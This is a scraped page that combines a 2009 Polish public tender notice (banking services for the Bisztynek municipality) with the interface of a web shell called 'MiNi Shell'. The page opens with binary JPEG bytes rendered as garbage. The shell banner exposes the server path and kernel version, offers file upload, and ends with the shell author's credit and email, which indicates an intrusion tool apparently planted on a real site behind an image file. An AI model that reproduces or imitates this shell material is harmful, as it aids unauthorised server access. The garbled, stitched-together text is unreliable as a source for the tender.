JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/170626-N-2009.html

<p class="kh_header"><b>Bisztynek: Bankowa obsługi budżetu Gminy Bisztynek</b><br>
<b>Numer ogłoszenia: 170626 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta , ul. Kościuszki 2, 11-230 Bisztynek, woj. warmińsko-mazurskie, tel. 089 7188616, faks 089 7188603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.regioset.pl/bisztynek</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http//bisztynek-ugim.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankowa obsługi budżetu Gminy Bisztynek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bankowa obsługi budżetu Gminy Bisztynek, obejmująca następujące jednostki:
a)	Urząd Miejski w Bisztynku
b)	Gimnazjum Publiczne w Bisztynku
c)	Szkoła Podstawowa w Bisztynku
d)	Szkoła Podstawowa w Grzędzie
e)	Szkoła Podstawowa w Sątopach
f)	Przedszkole Samorządowe w Bisztynku
g)	Miejski Ośrodek Pomocy Społecznej w Bisztynku
h)	Zakład Budżetowy Gospodarki Komunalnej i Mieszkaniowej w Bisztynku
i)	Ośrodek Kultury i Aktywności Lokalnej 
polegającej na:
-	otwarciu i prowadzeniu rachunków bieżących i pomocniczych
-	przyjmowaniu wpłat gotówkowych
-	dokonywanie wypłat gotówkowych
-	wydawanie blankietów czeków
-	realizacji przelewów tradycyjnych oraz z wykorzystaniem bankowości elektronicznej, 
-	generowanie i dostarczanie obsługiwanym jednostkom wyciągów bankowych wraz z załącznikami
-	przyjmowanie środków finansowych na lokaty
-	kredytowanie w rachunku bieżącym
-	wydawanie opinii bankowej o prowadzonym rachunku bankowym, oraz innych opinii i zaświadczeń
-	otwieranie i prowadzenie dodatkowych rachunków w trakcie umowy, zgodnie z wnioskami jednostek

Zamawiający zastrzega:
1	zamawiający będzie miał możliwość codziennego pobierania i odprowadzania gotówki na dowolne rachunki zmawiającego w miejscowości będącej siedzibą zamawiającego
2	zamawiający nie dopuszcza możliwości pobierania opłat lub prowizji od podmiotów dokonujących wpłat gotówkowych na rzecz jednostek wskazanych w SIWZ - wpłaty takie traktowane są, jak wpłaty zamawiającego
3	zamawiający będzie miał możliwość otrzymywania bezpłatnie codziennie wyciągów bankowych z dnia poprzedniego z wszystkich rachunków zamawiającego

W ramach umowy Bank powinien:
1.	posiadać zdolność do prowadzenia transakcji dewizowych
2.	udostępnić jednostkom: 
a)	Urząd Miejski w Bisztynku
b)	Gimnazjum Publiczne w Bisztynku
c)	Szkoła Podstawowa w Bisztynku
d)	Szkoła Podstawowa w Grzędzie
e)	Szkoła Podstawowa w Sątopach
f)	Przedszkole samorządowe w Bisztynku
g)	Miejski Ośrodek Pomocy Społecznej w Bisztynku
system bankowości elektronicznej, umożliwiający dokonywanie przelewów, płatności masowych oraz uzyskiwanie informacji o operacjach bankowych, stanie rachunku i dokonywanych operacjach, przy czym jednostki oznaczone literami od b) do f) obsługiwane będą wspólnie z Urzędem Miejskim w Bisztynku
3.	zapewnić instalację oprogramowania, przeszkolenie pracowników i świadczenie usług bankowości elektronicznej we wskazanych jednostkach organizacyjnych gminy.
4.	zapewnienie bezpłatnej pomocy technicznej w okresie wdrożenia dla pracowników Urzędu jak i jednostek organizacyjnych pracujących w systemie bankowości elektronicznej.
5.	świadczyć usługi doradczo-finansowe dla gminy.
Główny przedmiot zamówienia: CPV  66.11.00.00-3 Usługi bankowe

Wymagania stawiane Wykonawcy:
-	jest odpowiedzialny za właściwą jakość wykonania przedmiotu zamówienia, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
-	powinien dochować należytej staranności przy realizacji zobowiązań umowy, 
-	powinien uzgadniać decyzje dotyczące wykonywania zamówienia z przedstawicielem zamawiającego. 
-	powinien zapewnić właściwą komunikację z Zamawiającym poprzez dostępność telefoniczną oraz za pośrednictwem emaila lub faksu.

Zamawiający przewiduje następujące ilości operacji:
1.	otwarcie i prowadzenie 10 rachunków bieżących 
2.	otwarcie i prowadzenie 16 rachunków pomocniczych
3.	uruchomienie bankowości elektronicznej w 2 jednostkach (Urząd Miejski w Bisztynku i Miejski Ośrodek Pomocy Społecznej w Bisztynku, przy czym Urząd obsługuje w ramach jednego systemu szkoły i przedszkola)
4.	przelewy tradycyjne:
a)	na rachunki prowadzone w innych bankach - 1000 rocznie
b)	składki ZUS - 105 rocznie
5.	przelewy realizowane za pomocą bankowości elektronicznej:
a)	na rachunki prowadzone w innych bankach - 5000 rocznie
b)	składki ZUS - 258 rocznie
c)	przelewy na rachunki jednostek Gminy Bisztynek - 400 rocznie
6.	rocznie 580 blankietów czeków
7.	rocznie 500 wpłat gotówkowych
8.	rocznie 580 wypłat gotówkowych
9.	rocznie 60 wpłat inkasentów (sołtysów).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1. Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 
2.2. Podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3. Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 
2.4. Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5. Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych

3. Zamawiający odrzuca ofertę wykonawcy:
3.1. Niezgodną z ustawą lub której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.
3.2. Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
3.3. Zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia.
3.4. Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.5. Zawiera błędy w obliczeniu ceny 
3.6. Wykonawcy, który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych 
3.7. Nieważną na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą dokumentów potwierdzających spełnienie warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
1.	Formularz ofertowy - z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
2.	Opis przedmiotu zamówienia - z wykorzystaniem wzoru - załącznik nr 2 do SIWZ
3.	Oświadczenia - z wykorzystaniem wzoru - załącznik nr 3 do SIWZ
4.	Projekt umowy

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności składa następujące dokumenty:Zaświadczenie z właściwego organu rejestrowego, że wykonawca jest uprawniony do występowania w obrocie prawnym, potwierdzające, że profil działania wykonawcy odpowiada profilowi usług objętych postępowaniem oraz wskazujące osobę upoważnioną do dokonywania czynności prawnych w imieniu wykonawcy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez wykonawcę lub osobę osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bisztynek-ugim.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bisztynku
ul. Kościuszki 2
11-230 Bisztynek
pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2009 godzina 10:00, miejsce: Urząd Miejski w Bisztynku
ul. Kościuszki 2
11-230 Bisztynek
pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com